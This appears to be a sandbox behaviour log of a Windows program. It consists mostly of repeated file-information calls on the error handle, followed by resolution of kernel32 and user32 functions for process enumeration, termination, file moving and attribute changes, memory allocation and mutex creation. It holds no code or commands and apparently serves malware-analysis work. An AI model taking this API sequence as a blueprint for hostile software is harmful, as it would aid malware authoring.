File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76bdd8d0 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76bd8b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76bd8c50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76bd8c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76bd9fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76bdfbc0 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76be6530 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76bd8c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x76be6340 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76be64a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x76bda770 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x76bfd410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x76be6510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x76be6300 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x771e53c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76be6110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76be57f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x76bd92b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x76bd9a90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x76bdfcb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76bd77b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76bdfbc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x76bd7960 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x76be60f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x76bd7540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x76bdc8c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x76bda510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x76be5f50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x771f2570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76bd2d60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x76bd0570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x76bdee30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x76bdc9b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x76bd7610 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x771e95f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x76be6250 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x76bd78d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76be61d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76be6290 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x76bda410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x76be3e90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x76be62e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x76be4cc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x76be6450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76bdd8d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x76bd9700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76be5f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x76bfd320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x76bd91e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76bd2db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x76be6420 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76be6180 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76bd9560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76be6590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76bd9660 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x76bd94b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x76bd8c10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x76be5fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x76be6360 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x76bd9540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x76bde320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76bd9640 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76bd8b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76be7510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76bd2d80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76bd7940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76bd7910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76bd25e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x771cda90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x76be3a30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x76bdefc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76be74f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76bd9680 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74500000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x74533230 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x74517740 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x74534ea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x745356f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x7451b9d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x74518ee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x74517710 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x74511830 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74534ec0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x745350f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x7452ddf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x745352a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x745191c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x745138f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x74513e40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x7720caa0 True 1
Fn
